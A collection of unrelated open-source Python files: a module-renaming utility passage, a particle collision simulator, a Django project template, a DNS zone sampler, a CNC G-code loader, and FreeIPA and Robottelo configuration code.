old_rst_file_name = old_module_name + '.rst' new_rst_file_name = new_module_name + '.rst' old_api_path = os.path.join( old_docs_path, old_tools_package_name, old_rst_file_name) new_api_path = os.path.join( new_docs_path, new_tools_package_name, new_rst_file_name) command = 'mv {} {}'.format( old_api_path, new_api_path) systemtools.IOManager.spawn_subprocess(command) print('') def _rename_old_module(self, old_codebase, old_tools_package_name, old_module_name, new_codebase, new_tools_package_name, new_module_name, ): print('Renaming old module ...') old_tools_path = self._codebase_name_to_codebase_tools_path( old_codebase) new_tools_path = self._codebase_name_to_codebase_tools_path( new_codebase) old_module = old_module_name + '.py' old_path = os.path.join( old_tools_path, old_tools_package_name, old_module) new_module = new_module_name + '.py' new_path = os.path.join( new_tools_path, new_tools_package_name, new_module) command = 'git mv -f {} {}'.format( old_path, new_path) systemtools.IOManager.spawn_subprocess(command) print('') def _rename_old_test_files(self, old_codebase, old_tools_package_name, old_module_name, new_codebase, new_tools_package_name, new_module_name, ): print('Renaming old test file(s) ...') old_tools_path = self._codebase_name_to_codebase_tools_path( old_codebase) old_test_path = os.path.join( old_tools_path, old_tools_package_name, 'test') if not os.path.exists(old_test_path): return new_tools_path = self._codebase_name_to_codebase_tools_path( new_codebase) new_test_path = os.path.join( new_tools_path, new_tools_package_name, 'test') old_test_file_prefix = 'test_{}_{}'.format( old_tools_package_name, old_module_name) old_test_file_names = [x for x in os.listdir(old_test_path) if x.startswith(old_test_file_prefix) and x.endswith('.py')] for old_test_file_name in old_test_file_names: old_test_file_path = os.path.join( old_test_path, old_test_file_name) old_test_file_suffix = old_test_file_name[ len(old_test_file_prefix):] new_test_file_name = 'test_{}_{}{}'.format( new_tools_package_name, new_module_name, old_test_file_suffix) new_test_file_path = os.path.join( new_test_path, new_test_file_name) command = 'git mv -f {} {}'.format( old_test_file_path, new_test_file_path) systemtools.IOManager.spawn_subprocess(command) print('') def _update_codebase(self, old_codebase, old_tools_package_name, old_module_name, new_codebase, new_tools_package_name, new_module_name, ): from abjad import abjad_configuration without_dirs = ['--without-dirs', 'build', '--without-dirs', '_build'] directory = abjad_configuration.abjad_root_directory print('Updating codebase ...') print('') old_text = '{}.{}'.format(old_tools_package_name, old_module_name) new_text = '{}.{}'.format(new_tools_package_name, new_module_name) command = [ directory, old_text, new_text, '--force', '--whole-words-only', #'--verbose', ] command.extend(without_dirs) ReplaceInFilesScript()(command) print('') old_text = 'test_{}_{}_'.format( old_tools_package_name, old_module_name) new_text = 'test_{}_{}_'.format( new_tools_package_name, new_module_name) command = [directory, old_text, new_text, '--force', '--verbose'] command.extend(without_dirs) ReplaceInFilesScript()(command) print('') old_text = old_module_name new_text = new_module_name command = [ directory, old_text, new_text, '--force', '--whole-words-only', #'--verbose', ] command.extend(without_dirs) ReplaceInFilesScript()(command) print('') ### PUBLIC METHODS ### def process_args(self, args): r'''Processes `args`. Returns none. ''' systemtools.IOManager.clear_terminal() # Handle source path: old_codebase, old_tools_package_name, old_module_name = \ self._parse_tools_package_path(args.source) old_codebase_tools_path = self._codebase_name_to_codebase_tools_path( old_codebase) old_module_path = os.path.join( old_codebase_tools_path, old_tools_package_name, old_module_name + '.py', ) if not os.path.exists(old_module_path): message = 'source does not exist: {}' message = message.format(old_module_path) raise SystemExit(message) # Handle destination path: new_codebase, new_tools_package_name, new_module_name = \ self._parse_tools_package_path(args.destination) new_codebase_tools_path = self._codebase_name_to_codebase_tools_path( new_codebase) new_module_path = os.path.join( new_codebase_tools_path, new_tools_package_name, new_module_name + '.py', ) if os.path.exists(new_module_path): message = 'destination already exists: {}' message = message.format(old_module_path) raise SystemExit(message) # Process changes: new_args = ( old_codebase, old_tools_package_name, old_module_name, new_codebase, new_tools_package_name, new_module_name, ) if not self._confirm_name_changes(*new_args): raise SystemExit self._rename_old_test_files(*new_args) self._rename_old_api_page(*new_args) self._rename_old_module(*new_args) self._update_codebase(*new_args) raise SystemExit def setup_argument_parser(self, parser): r'''Sets up argument `parser`. Returns none. ''' parser.add_argument( 'source', help='toolspackage path of source module', ) parser.add_argument( 'destination', help='toolspackage path of destination module', )
hniemeyer/HardSphereSim
EventManager.py
""" Module defining the Event class which is used to manage collissions and check their validity """ from itertools import combinations from copy import copy from particle import Particle class EventParticle(object): def __init__(self, particle1, particle2): self.particle1 = particle1 self.particle2 = particle2 self.id = (self.particle1.getCollisionCountAsCopy(), self.particle2.getCollisionCountAsCopy()) self.timeUntilCollision = self.particle1.collideParticle(self.particle2) def isValid(self): return self.id == (self.particle1.getCollisionCountAsCopy(), self.particle2.getCollisionCountAsCopy()) def reevaluateCollisionTime(self): self.id = (self.particle1.getCollisionCountAsCopy(), self.particle2.getCollisionCountAsCopy()) self.timeUntilCollision = self.particle1.collideParticle(self.particle2) def doCollision(self): self.particle1.bounceParticle(self.particle2) class EventWallX(object): def __init__(self, particle): self.particle = particle self.id = self.particle.getCollisionCountAsCopy() self.timeUntilCollision = self.particle.collidesWallX() def isValid(self): return self.id == self.particle.getCollisionCountAsCopy() def reevaluateCollisionTime(self): self.id = self.particle.getCollisionCountAsCopy() self.timeUntilCollision = self.particle.collidesWallX() def doCollision(self): self.particle.bounceX() class EventWallY(object): def __init__(self, particle): self.particle = particle self.id = self.particle.getCollisionCountAsCopy() self.timeUntilCollision = self.particle.collidesWallY() def isValid(self): return self.id == self.particle.getCollisionCountAsCopy() def reevaluateCollisionTime(self): self.id = self.particle.getCollisionCountAsCopy() self.timeUntilCollision = self.particle.collidesWallY() def doCollision(self): self.particle.bounceY() class EventManager(object): def __init__(self, ListOfParticles): self.ListOfParticles = ListOfParticles self.ListOfEvents = [] for (particle1, particle2) in combinations(self.ListOfParticles, 2): self.ListOfEvents.append(EventParticle(particle1, particle2)) for particle in self.ListOfParticles: self.ListOfEvents.append(EventWallX(particle)) self.ListOfEvents.append(EventWallY(particle)) self.sortEventList() def sortEventList(self): def sorting_closure(event): if event.timeUntilCollision is None or event.timeUntilCollision < 0.0: return 1.0e7 else: return event.timeUntilCollision self.ListOfEvents = sorted(self.ListOfEvents, key=sorting_closure) def step(self): for event in self.ListOfEvents: if not event.isValid(): event.reevaluateCollisionTime() self.sortEventList() collTime = copy(self.ListOfEvents[0].timeUntilCollision) for particle in self.ListOfParticles: particle.advance(collTime) self.ListOfEvents[0].doCollision() for event in self.ListOfEvents: if event.timeUntilCollision is not None: event.timeUntilCollision -= collTime if __name__ == '__main__': import numpy as np import pylab as plt a = Particle(np.array([0.1, 0.5]), np.array([0.01, 0.1]), 0.05, 2.0) b = Particle(np.array([0.4, 0.5]), np.array([-0.1, 0.01]), 0.05, 2.0) manager = EventManager([a,b]) for i in range(20): plt.title(a.t) plt.scatter([a._x[0], b._x[0]], [a._x[1], b._x[1]]) print a._x print b._x plt.xlim([0,1]) plt.ylim([0,1]) plt.show() manager.step()
stephanepechard/projy
projy/templates/DjangoProjectTemplate.py
# -*- coding: utf-8 -*- """ Projy template for PythonPackage. """ # system from datetime import date from os import mkdir, rmdir from shutil import move from subprocess import call # parent class from projy.templates.ProjyTemplate import ProjyTemplate # collectors from projy.collectors.AuthorCollector import AuthorCollector from projy.collectors.AuthorMailCollector import AuthorMailCollector class DjangoProjectTemplate(ProjyTemplate): """ Projy template class for PythonPackage. """ def __init__(self): ProjyTemplate.__init__(self) def directories(self): """ Return the names of directories to be created. """ directories_description = [ self.project_name, self.project_name + '/conf', self.project_name + '/static', ] return directories_description def files(self): """ Return the names of files to be created. """ files_description = [ # configuration [ self.project_name, 'Makefile', 'DjangoMakefileTemplate' ], [ self.project_name + '/conf', 'requirements_base.txt', 'DjangoRequirementsBaseTemplate' ], [ self.project_name + '/conf', 'requirements_dev.txt', 'DjangoRequirementsDevTemplate' ], [ self.project_name + '/conf', 'requirements_production.txt', 'DjangoRequirementsProdTemplate' ], [ self.project_name + '/conf', 'nginx.conf', 'DjangoNginxConfTemplate' ], [ self.project_name + '/conf', 'supervisord.conf', 'DjangoSupervisorConfTemplate' ], [ self.project_name, 'fabfile.py', 'DjangoFabfileTemplate' ], [ self.project_name, 'CHANGES.txt', 'PythonPackageCHANGESFileTemplate' ], [ self.project_name, 'LICENSE.txt', 'GPL3FileTemplate' ], [ self.project_name, 'README.txt', 'READMEReSTFileTemplate' ], [ self.project_name, '.gitignore', 'DjangoGitignoreTemplate' ], # django files [ self.project_name, 'dev.py', 'DjangoSettingsDevTemplate' ], [ self.project_name, 'prod.py', 'DjangoSettingsProdTemplate' ], ] return files_description def substitutes(self): """ Return the substitutions for the templating replacements. """ author_collector = AuthorCollector() mail_collector = AuthorMailCollector() substitute_dict = { 'project': self.project_name, 'project_lower': self.project_name.lower(), 'date': date.today().isoformat(), 'author': author_collector.collect(), 'author_email': mail_collector.collect(), } return substitute_dict def posthook(self): # build the virtualenv call(['make']) # create the Django project call(['./venv/bin/django-admin.py', 'startproject', self.project_name]) # transform original settings files into 3 files for different env mkdir('{p}/settings'.format(p=self.project_name)) self.touch('{p}/settings/__init__.py'.format(p=self.project_name)) move('dev.py', '{p}/settings'.format(p=self.project_name)) move('prod.py', '{p}/settings'.format(p=self.project_name)) move('{p}/{p}/settings.py'.format(p=self.project_name), '{p}/settings/base.py'.format(p=self.project_name)) # organize files nicely mkdir('{p}/templates'.format(p=self.project_name)) move('{p}/manage.py'.format(p=self.project_name), 'manage.py') move('{p}/{p}/__init__.py'.format(p=self.project_name), '{p}/'.format(p=self.project_name)) move('{p}/{p}/urls.py'.format(p=self.project_name), '{p}/'.format(p=self.project_name)) move('{p}/{p}/wsgi.py'.format(p=self.project_name), '{p}/'.format(p=self.project_name)) rmdir('{p}/{p}'.format(p=self.project_name)) # create empty git repo call(['git', 'init']) # replace some lines self.replace_in_file('{p}/wsgi.py'.format(p=self.project_name), '"{p}.settings"'.format(p=self.project_name), '"{p}.settings.production"'.format(p=self.project_name)) self.replace_in_file('{p}/settings/base.py'.format(p=self.project_name), u" # ('Your Name', 'your_email@example.com'),", u" ('{}', '{}'),".format(self.substitutes()['author'], self.substitutes()['author_email']))
smutt/WRL
topThick.py
#!/usr/bin/python # The file is part of the WRL Project. # # The WRL Project is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # The WRL Project is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # # Copyright (C) 2017, Andrew McConachie, <andrew.mcconachie@icann.org> import os import sys import random import dns.resolver numTestDomains = 100 numTopTLDs = 100 ignoreDomains = ['com', 'net', 'jobs', 'cat', 'mil', 'edu', 'gov', 'int', 'arpa'] serverZone = '.ws.sp.am' # DNS Zone containing CNAME records pointing to whois FQDNs def dbg(s): # print s pass random.seed() zFiles = os.listdir('zonefiles/') #dbgFiles = 10 # How many files to read while developing this, remove when finished coding tlds = [] for zf in zFiles: # if len(tlds) >= dbgFiles: # For developing, remove when finished coding # break dbg(zf) tld = {} if zf.find(".txt") == -1: dbg("This should not happen") continue zfh = open('zonefiles/' + zf, 'r') lines = zfh.read().splitlines() zfh.close() dbg("after file read") tld['name'] = lines[0].split(".")[0].strip() if tld['name'] in ignoreDomains: dbg("Ignoring:" + tld['name']) continue dbg("after name split") rrs = [] for line in lines: rr = line.split("\t") rrs.append(rr) dbg("after rr split") ns = [] for rr in rrs: if rr[3].lower() == 'ns': ns.append(rr[0].split(".")[0]) dbg("after counting NS records") if len(ns) < numTestDomains: continue else: tld['size'] = len(ns) tld['domains'] = random.sample(ns, numTestDomains) for d in tld['domains']: dbg(d + "." + tld['name']) dbg(tld['name'] + ": " + str(tld['size'])) tlds.append(tld) tlds.sort(key=lambda tld: tld['size'], reverse=True) for ii in xrange(numTopTLDs): # Find FQDN of whois server d = dns.resolver.Resolver() try: resp = d.query(tlds[ii]['name'] + serverZone, 'CNAME') if len(resp.rrset) < 1: whois = 'UNKNOWN' else: whois = str(resp.rrset[0]).strip('.') except: whois = 'UNKNOWN' s = whois + ',' for dom in tlds[ii]['domains']: s += dom + '.' + tlds[ii]['name'] + ',' print s.strip(',')
fsantini/rasPyCNCController
gcode/GCodeLoader.py
# rasPyCNCController # Copyright 2016 Francesco Santini <francesco.santini@gmail.com> # # This file is part of rasPyCNCController. # # rasPyCNCController is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # rasPyCNCController is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with rasPyCNCController. If not, see <http://www.gnu.org/licenses/>. from PySide import QtCore from GCodeAnalyzer import GCodeAnalyzer import sys import pycnc_config class GCodeLoader(QtCore.QThread): load_finished = QtCore.Signal() load_error = QtCore.Signal(object) def __init__(self): QtCore.QThread.__init__(self) self.file = None self.gcode = None self.times = None self.bBox = None self.loaded = False self.totalTime = 0 self.busy = False self.g0_feed = pycnc_config.G0_FEED def run(self): self.loaded = False self.gcode = [] self.times = [] self.bBox = None self.totalTime = 0 self.busy = True analyzer = GCodeAnalyzer() analyzer.fastf = self.g0_feed try: with open(self.file) as f: for line in f: analyzer.Analyze(line) self.gcode.append(line) self.times.append(analyzer.getTravelTime()*60) # time returned is in minutes: convert to seconds except: self.busy = False e = sys.exc_info()[0] self.load_error.emit("%s" % e) return self.busy = False self.loaded = True self.totalTime = self.times[-1] self.bBox = analyzer.getBoundingBox() self.load_finished.emit() def load(self, file): self.file = file self.start()
encukou/freeipa
ipapython/config.py
# Authors: Karl MacMillan <kmacmill@redhat.com> # # Copyright (C) 2007 Red Hat # see file 'COPYING' for use and warranty information # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # from __future__ import absolute_import # pylint: disable=deprecated-module from optparse import ( Option, Values, OptionParser, IndentedHelpFormatter, OptionValueError) # pylint: enable=deprecated-module from copy import copy from configparser import SafeConfigParser from urllib.parse import urlsplit import socket import functools from dns.exception import DNSException import dns.name from ipaplatform.paths import paths from ipapython.dn import DN from ipapython.dnsutil import query_srv from ipapython.ipautil import CheckedIPAddress, CheckedIPAddressLoopback class IPAConfigError(Exception): def __init__(self, msg=''): self.msg = msg Exception.__init__(self, msg) def __repr__(self): return self.msg __str__ = __repr__ class IPAFormatter(IndentedHelpFormatter): """Our own optparse formatter that indents multiple lined usage string.""" def format_usage(self, usage): usage_string = "Usage:" spacing = " " * len(usage_string) lines = usage.split("\n") ret = "%s %s\n" % (usage_string, lines[0]) for line in lines[1:]: ret += "%s %s\n" % (spacing, line) return ret def check_ip_option(option, opt, value, allow_loopback=False): try: if allow_loopback: return CheckedIPAddressLoopback(value) else: return CheckedIPAddress(value) except Exception as e: raise OptionValueError("option {}: invalid IP address {}: {}" .format(opt, value, e)) def check_dn_option(option, opt, value): try: return DN(value) except Exception as e: raise OptionValueError("option %s: invalid DN: %s" % (opt, e)) def check_constructor(option, opt, value): con = option.constructor assert con is not None, "Oops! Developer forgot to set 'constructor' kwarg" try: return con(value) except Exception as e: raise OptionValueError("option {} invalid: {}".format(opt, e)) class IPAOption(Option): """ optparse.Option subclass with support of options labeled as security-sensitive such as passwords. """ ATTRS = Option.ATTRS + ["sensitive", "constructor"] TYPES = Option.TYPES + ("ip", "dn", "constructor", "ip_with_loopback") TYPE_CHECKER = copy(Option.TYPE_CHECKER) TYPE_CHECKER["ip"] = check_ip_option TYPE_CHECKER["ip_with_loopback"] = functools.partial(check_ip_option, allow_loopback=True) TYPE_CHECKER["dn"] = check_dn_option TYPE_CHECKER["constructor"] = check_constructor class IPAOptionParser(OptionParser): """ optparse.OptionParser subclass that uses IPAOption by default for storing options. """ def __init__(self, usage=None, option_list=None, option_class=IPAOption, version=None, conflict_handler="error", description=None, formatter=None, add_help_option=True, prog=None): OptionParser.__init__(self, usage, option_list, option_class, version, conflict_handler, description, formatter, add_help_option, prog) def get_safe_opts(self, opts): """ Returns all options except those with sensitive=True in the same fashion as parse_args would """ all_opts_dict = { o.dest: o for o in self._get_all_options() if hasattr(o, 'sensitive') } safe_opts_dict = {} for option, value in opts.__dict__.items(): if not all_opts_dict[option].sensitive: safe_opts_dict[option] = value return Values(safe_opts_dict) def verify_args(parser, args, needed_args = None): """Verify that we have all positional arguments we need, if not, exit.""" if needed_args: needed_list = needed_args.split(" ") else: needed_list = [] len_need = len(needed_list) len_have = len(args) if len_have > len_need: parser.error("too many arguments") elif len_have < len_need: parser.error("no %s specified" % needed_list[len_have]) class IPAConfig: def __init__(self): self.default_realm = None self.default_server = [] self.default_domain = None def get_realm(self): if self.default_realm: return self.default_realm else: raise IPAConfigError("no default realm") def get_server(self): if len(self.default_server): return self.default_server else: raise IPAConfigError("no default server") def get_domain(self): if self.default_domain: return self.default_domain else: raise IPAConfigError("no default domain") # Global library config config = IPAConfig() def __parse_config(discover_server = True): p = SafeConfigParser() p.read(paths.IPA_DEFAULT_CONF) try: if not config.default_realm: config.default_realm = p.get("global", "realm") except Exception: pass if discover_server: try: s = p.get("global", "xmlrpc_uri") server = urlsplit(s) config.default_server.append(server.netloc) except Exception: pass try: if not config.default_domain: config.default_domain = p.get("global", "domain") except Exception: pass def __discover_config(discover_server = True): servers = [] try: if not config.default_domain: # try once with REALM -> domain domain = str(config.default_realm).lower() name = "_ldap._tcp." + domain try: servers = query_srv(name) except DNSException: # try cycling on domain components of FQDN try: domain = dns.name.from_text(socket.getfqdn()) except DNSException: return False while True: domain = domain.parent() if str(domain) == '.': return False name = "_ldap._tcp.%s" % domain try: servers = query_srv(name) break except DNSException: pass config.default_domain = str(domain).rstrip(".") if discover_server: if not servers: name = "_ldap._tcp.%s." % config.default_domain try: servers = query_srv(name) except DNSException: pass for server in servers: hostname = str(server.target).rstrip(".") config.default_server.append(hostname) except Exception: pass return None def add_standard_options(parser): parser.add_option("--realm", dest="realm", help="Override default IPA realm") parser.add_option("--server", dest="server", help="Override default FQDN of IPA server") parser.add_option("--domain", dest="domain", help="Override default IPA DNS domain") def init_config(options=None): if options: config.default_realm = options.realm config.default_domain = options.domain if options.server: config.default_server.extend(options.server.split(",")) if len(config.default_server): discover_server = False else: discover_server = True __parse_config(discover_server) __discover_config(discover_server) # make sure the server list only contains unique items new_server = [] for server in config.default_server: if server not in new_server: new_server.append(server) config.default_server = new_server if not config.default_realm: raise IPAConfigError("IPA realm not found in DNS, in the config file (/etc/ipa/default.conf) or on the command line.") if not config.default_server: raise IPAConfigError("IPA server not found in DNS, in the config file (/etc/ipa/default.conf) or on the command line.") if not config.default_domain: raise IPAConfigError("IPA domain not found in the config file (/etc/ipa/default.conf) or on the command line.")
Ichimonji10/robottelo
robottelo/config/base.py
"""Define and instantiate the configuration class for Robottelo.""" import logging import os import sys from logging import config from nailgun import entities, entity_mixins from nailgun.config import ServerConfig from robottelo.config import casts from six.moves.urllib.parse import urlunsplit, urljoin from six.moves.configparser import ( NoOptionError, NoSectionError, ConfigParser ) LOGGER = logging.getLogger(__name__) SETTINGS_FILE_NAME = 'robottelo.properties' class ImproperlyConfigured(Exception): """Indicates that Robottelo somehow is improperly configured. For example, if settings file can not be found or some required configuration is not defined. """ def get_project_root(): """Return the path to the Robottelo project root directory. :return: A directory path. :rtype: str """ return os.path.realpath(os.path.join( os.path.dirname(__file__), os.pardir, os.pardir, )) class INIReader(object): """ConfigParser wrapper able to cast value when reading INI options.""" # Helper casters cast_boolean = casts.Boolean() cast_dict = casts.Dict() cast_list = casts.List() cast_logging_level = casts.LoggingLevel() cast_tuple = casts.Tuple() cast_webdriver_desired_capabilities = casts.WebdriverDesiredCapabilities() def __init__(self, path): self.config_parser = ConfigParser() with open(path) as handler: self.config_parser.readfp(handler) if sys.version_info[0] < 3: # ConfigParser.readfp is deprecated on Python3, read_file # replaces it self.config_parser.readfp(handler) else: self.config_parser.read_file(handler) def get(self, section, option, default=None, cast=None): """Read an option from a section of a INI file. The default value will return if the look up option is not available. The value will be cast using a callable if specified otherwise a string will be returned. :param section: Section to look for. :param option: Option to look for. :param default: The value that should be used if the option is not defined. :param cast: If provided the value will be cast using the cast provided. """ try: value = self.config_parser.get(section, option) if cast is not None: if cast is bool: value = self.cast_boolean(value) elif cast is dict: value = self.cast_dict(value) elif cast is list: value = self.cast_list(value) elif cast is tuple: value = self.cast_tuple(value) else: value = cast(value) except (NoSectionError, NoOptionError): value = default return value def has_section(self, section): """Check if section is available.""" return self.config_parser.has_section(section) class FeatureSettings(object): """Settings related to a feature. Create a instance of this class and assign attributes to map to the feature options. """ def read(self, reader): """Subclasses must implement this method in order to populate itself with expected settings values. :param reader: An INIReader instance to read the settings. """ raise NotImplementedError('Subclasses must implement read method.') def validate(self): """Subclasses must implement this method in order to validade the settings and raise ``ImproperlyConfigured`` if any issue is found. """ raise NotImplementedError('Subclasses must implement validate method.') class ServerSettings(FeatureSettings): """Satellite server settings definitions.""" def __init__(self, *args, **kwargs): super(ServerSettings, self).__init__(*args, **kwargs) self.admin_password = None self.admin_username = None self.hostname = None self.port = None self.scheme = None self.ssh_key = None self.ssh_password = None self.ssh_username = None def read(self, reader): """Read and validate Satellite server settings.""" self.admin_password = reader.get( 'server', 'admin_password', 'changeme') self.admin_username = reader.get( 'server', 'admin_username', 'admin') self.hostname = reader.get('server', 'hostname') self.port = reader.get('server', 'port', cast=int) self.scheme = reader.get('server', 'scheme', 'https') self.ssh_key = reader.get('server', 'ssh_key') self.ssh_password = reader.get('server', 'ssh_password') self.ssh_username = reader.get('server', 'ssh_username', 'root') def validate(self): validation_errors = [] if self.hostname is None: validation_errors.append('[server] hostname must be provided.') if (self.ssh_key is None and self.ssh_password is None): validation_errors.append( '[server] ssh_key or ssh_password must be provided.') return validation_errors def get_credentials(self): """Return credentials for interacting with a Foreman deployment API. :return: A username-password pair. :rtype: tuple """ return (self.admin_username, self.admin_password) def get_url(self): """Return the base URL of the Foreman deployment being tested. The following values from the config file are used to build the URL: * ``[server] scheme`` (default: https) * ``[server] hostname`` (required) * ``[server] port`` (default: none) Setting ``port`` to 80 does *not* imply that ``scheme`` is 'https'. If ``port`` is 80 and ``scheme`` is unset, ``scheme`` will still default to 'https'. :return: A URL. :rtype: str """ if not self.scheme: scheme = 'https' else: scheme = self.scheme # All anticipated error cases have been handled at this point. if not self.port: return urlunsplit((scheme, self.hostname, '', '', '')) else: return urlunsplit(( scheme, '{0}:{1}'.format(self.hostname, self.port), '', '', '' )) def get_pub_url(self): """Return the pub URL of the server being tested. The following values from the config file are used to build the URL: * ``main.server.hostname`` (required) :return: The pub directory URL. :rtype: str """ return urlunsplit(('http', self.hostname, 'pub/', '', '')) def get_cert_rpm_url(self): """Return the Katello cert RPM URL of the server being tested. The following values from the config file are used to build the URL: * ``main.server.hostname`` (required) :return: The Katello cert RPM URL. :rtype: str """ return urljoin( self.get_pub_url(), 'katello-ca-consumer-latest.noarch.rpm') class ClientsSettings(FeatureSettings): """Clients settings definitions.""" def __init__(self, *args, **kwargs): super(ClientsSettings, self).__init__(*args, **kwargs) self.image_dir = None self.provisioning_server = None def read(self, reader): """Read clients settings.""" self.image_dir = reader.get( 'clients', 'image_dir', '/opt/robottelo/images') self.provisioning_server = reader.get( 'clients', 'provisioning_server') def validate(self): """Validate clients settings.""" validation_errors = [] if self.provisioning_server is None: validation_errors.append( '[clients] provisioning_server option must be provided.') return validation_errors class DockerSettings(FeatureSettings): """Docker settings definitions.""" def __init__(self, *args, **kwargs): super(DockerSettings, self).__init__(*args, **kwargs) self.unix_socket = None self.external_url = None self.external_registry_1 = None self.external_registry_2 = None def read(self, reader): """Read docker settings.""" self.unix_socket = reader.get( 'docker', 'unix_socket', False, bool) self.external_url = reader.get('docker', 'external_url') self.external_registry_1 = reader.get('docker', 'external_registry_1') self.external_registry_2 = reader.get('docker', 'external_registry_2') def validate(self): """Validate docker settings.""" validation_errors = [] if not any((self.unix_socket, self.external_url)): validation_errors.append( 'Either [docker] unix_socket or external_url options must ' 'be provided or enabled.') if not all((self.external_registry_1, self.external_registry_2)): validation_errors.append( 'Both [docker] external_registry_1 and external_registry_2 ' 'options must be provided.') return validation_errors def get_unix_socket_url(self): """Use the unix socket connection to the local docker daemon. Make sure that your Satellite server's docker is configured to allow foreman user accessing it. This can be done by:: $ groupadd docker $ usermod -aG docker foreman # Add -G docker to the options for the docker daemon $ systemctl restart docker $ katello-service restart """ return ( 'unix:///var/run/docker.sock' if self.unix_socket else None ) class FakeManifestSettings(FeatureSettings): """Fake manifest settings defintitions.""" def __init__(self, *args, **kwargs): super(FakeManifestSettings, self).__init__(*args, **kwargs) self.cert_url = None self.key_url = None self.url = None def read(self, reader): """Read fake manifest settings.""" self.cert_url = reader.get( 'fake_manifest', 'cert_url') self.key_url = reader.get( 'fake_manifest', 'key_url') self.url = reader.get( 'fake_manifest', 'url') def validate(self): """Validate fake manifest settings.""" validation_errors = [] if not all(vars(self).values()): validation_errors.append( 'All [fake_manifest] cert_url, key_url, url options must ' 'be provided.' ) return validation_errors class LDAPSettings(FeatureSettings): """LDAP settings definitions.""" def __init__(self, *args, **kwargs): super(LDAPSettings, self).__init__(*args, **kwargs) self.basedn = None self.grpbasedn = None self.hostname = None self.password = None self.username = None def read(self, reader): """Read LDAP settings.""" self.basedn = reader.get('ldap', 'basedn') self.grpbasedn = reader.get('ldap', 'grpbasedn') self.hostname = reader.get('ldap', 'hostname') self.password = reader.get('ldap', 'password') self.username = reader.get('ldap', 'username') def validate(self): """Validate LDAP settings.""" validation_errors = [] if not all(vars(self).values()): validation_errors.append( 'All [ldap] basedn, grpbasedn, hostname, password, ' 'username options must be provided.' ) return validation_errors class LibvirtHostSettings(FeatureSettings): """Libvirt host settings definitions.""" def __init__(self, *args, **kwargs): super(LibvirtHostSettings, self).__init__(*args, **kwargs) self.libvirt_image_dir = None self.libvirt_hostname = None def read(self, reader): """Read libvirt host settings.""" self.libvirt_image_dir = reader.get( 'compute_resources', 'libvirt_image_dir', '/var/lib/libvirt/images' ) self.libvirt_hostname = reader.get( 'compute_resources', 'libvirt_hostname') def validate(self): """Validate libvirt host settings.""" validation_errors = [] if self.libvirt_hostname is None: validation_errors.append( '[compute_resources] libvirt_hostname option must be provided.' ) return validation_errors class FakeCapsuleSettings(FeatureSettings): """Fake Capsule settings definitions.""" def __init__(self, *args, **kwargs): super(FakeCapsuleSettings, self).__init__(*args, **kwargs) self.port_range = None def read(self, reader): """Read fake capsule settings""" self.port_range = reader.get( 'fake_capsules', 'port_range', cast=tuple ) def validate(self): """Validate fake capsule settings.""" validation_errors = [] if self.port_range is None: validation_errors.append( '[fake_capsules] port_range option must be provided.' ) return validation_errors class RHEVSettings(FeatureSettings): """RHEV settings definitions.""" def __init__(self, *args, **kwargs): super(RHEVSettings, self).__init__(*args, **kwargs) # Compute Resource Information self.hostname = None self.username = None self.password = None self.datacenter = None self.vm_name = None # Image Information self.image_os = None self.image_arch = None self.image_username = None self.image_password = None self.image_name = None def read(self, reader): """Read rhev settings.""" # Compute Resource Information self.hostname = reader.get('rhev', 'hostname') self.username = reader.get('rhev', 'username') self.password = reader.get('rhev', 'password') self.datacenter = reader.get('rhev', 'datacenter') self.vm_name = reader.get('rhev', 'vm_name') # Image Information self.image_os = reader.get('rhev', 'image_os') self.image_arch = reader.get('rhev', 'image_arch') self.image_username = reader.get('rhev', 'image_username') self.image_password = reader.get('rhev', 'image_password') self.image_name = reader.get('rhev', 'image_name') def validate(self): """Validate rhev settings.""" validation_errors = [] if not all(vars(self).values()): validation_errors.append( 'All [rhev] hostname, username, password, datacenter, ' 'vm_name, image_name, image_os, image_arch, image_usernam, ' 'image_name options must be provided.' ) return validation_errors class VmWareSettings(FeatureSettings): """VmWare settings definitions.""" def __init__(self, *args, **kwargs): super(VmWareSettings, self).__init__(*args, **kwargs) # Compute Resource Information self.vcenter = None self.username = None self.password = None self.datacenter = None self.vm_name = None # Image Information self.image_os = None self.image_arch = None self.image_username = None self.image_password = None self.image_name = None def read(self, reader): """Read vmware settings.""" # Compute Resource Information self.vcenter = reader.get('vmware', 'hostname') self.username = reader.get('vmware', 'username') self.password = reader.get('vmware', 'password') self.datacenter = reader.get('vmware', 'datacenter') self.vm_name = reader.get('vmware', 'vm_name') # Image Information self.image_os = reader.get('vmware', 'image_os') self.image_arch = reader.get('vmware', 'image_arch') self.image_username = reader.get('vmware', 'image_username') self.image_password = reader.get('vmware', 'image_password') self.image_name = reader.get('vmware', 'image_name') def validate(self): """Validate vmware settings.""" validation_errors = [] if not all(vars(self).values()): validation_errors.append( 'All [vmware] hostname, username, password, datacenter, ' 'vm_name, image_name, image_os, image_arch, image_usernam, ' 'image_name options must be provided.' ) return validation_errors class DiscoveryISOSettings(FeatureSettings): """Discovery ISO name settings definition.""" def __init__(self, *args, **kwargs): super(DiscoveryISOSettings, self).__init__(*args, **kwargs) self.discovery_iso = None def read(self, reader): """Read discovery iso setting.""" self.discovery_iso = reader.get('discovery', 'discovery_iso') def validate(self): """Validate discovery iso name setting.""" validation_errors = [] if self.discovery_iso is None: validation_errors.append( '[discovery] discovery iso name must be provided.' ) return validation_errors class OscapSettings(FeatureSettings): """Oscap settings definitions.""" def __init__(self, *args, **kwargs): super(OscapSettings, self).__init__(*args, **kwargs) 